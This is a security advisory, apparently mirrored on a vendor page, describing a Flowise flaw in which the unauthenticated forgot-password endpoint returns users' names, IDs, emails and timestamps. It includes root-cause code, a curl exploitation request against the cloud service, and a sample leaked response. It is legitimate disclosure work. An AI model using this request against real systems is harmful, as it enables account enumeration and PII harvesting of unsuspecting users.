Launch Week Day 1: Announcing Security Design Review
Start for Free
UNKNOWN npm

Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint

GHSA-jc5m-wrp2-qq38

Published ยท Modified

Description

Summary

The /api/v1/account/forgot-password endpoint returns the full user object including PII (id, name, email, status, timestamps) in the response body instead of a generic success message. This exposes sensitive user information to unauthenticated attackers who only need to know a valid email address.

Vulnerability Details

Field Value
CWE CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Affected File packages/server/src/enterprise/services/account.service.ts (lines 517-545)
Endpoint POST /api/v1/account/forgot-password
Authentication None required
CVSS 3.1 3.7 (Low)

Root Cause

In account.service.ts, the forgotPassword method returns the sanitized user object instead of a simple success acknowledgment:

public async forgotPassword(data: AccountDTO) {
    // ...
    const user = await this.userService.readUserByEmail(data.user.email, queryRunner)
    if (!user) throw new InternalFlowiseError(StatusCodes.NOT_FOUND, UserErrorMessage.USER_NOT_FOUND)

    data.user = user
    // ... password reset logic ...

    return sanitizeUser(data.user)  // Returns user object with PII
}

The sanitizeUser function only removes sensitive authentication fields:

export function sanitizeUser(user: Partial<User>) {
    delete user.credential    // password hash
    delete user.tempToken     // reset token
    delete user.tokenExpiry

    return user  // Still contains: id, name, email, status, createdDate, updatedDate
}

Impact

An unauthenticated attacker can:

  1. Harvest PII: Collect user IDs, full names, and account metadata
  2. Profile users: Determine account creation dates and activity patterns
  3. Enumerate accounts: Confirm email existence and gather associated data
  4. Enable further attacks: Use harvested data for social engineering or targeted phishing

Exploitation

curl -X POST "https://cloud.flowiseai.com/api/v1/account/forgot-password" \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"victim@example.com"}}'

Evidence

Request:

POST /api/v1/account/forgot-password HTTP/1.1
Host: cloud.flowiseai.com
Content-Type: application/json

{"user":{"email":"vefag54010@naprb.com"}}

Response (201 Created):

{
    "id": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12",
    "name": "Vefag naprb",
    "email": "vefag54010@naprb.com",
    "status": "active",
    "createdDate": "2026-01-17T15:21:59.152Z",
    "updatedDate": "2026-01-17T15:35:06.492Z",
    "createdBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12",
    "updatedBy": "56c3fc72-4e85-49c9-a4b5-d1a46b373a12"
}
screenshot

Exposed Data

Field Risk
id Internal user UUID - enables targeted attacks
name Full name - PII disclosure
email Email confirmation
status Account state information
createdDate User profiling
updatedDate Activity tracking
createdBy / updatedBy Internal reference leak

Expected Behavior

A secure forgot-password endpoint should return a generic response regardless of whether the email exists:

{"message": "If this email exists, a password reset link has been sent."}

References

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes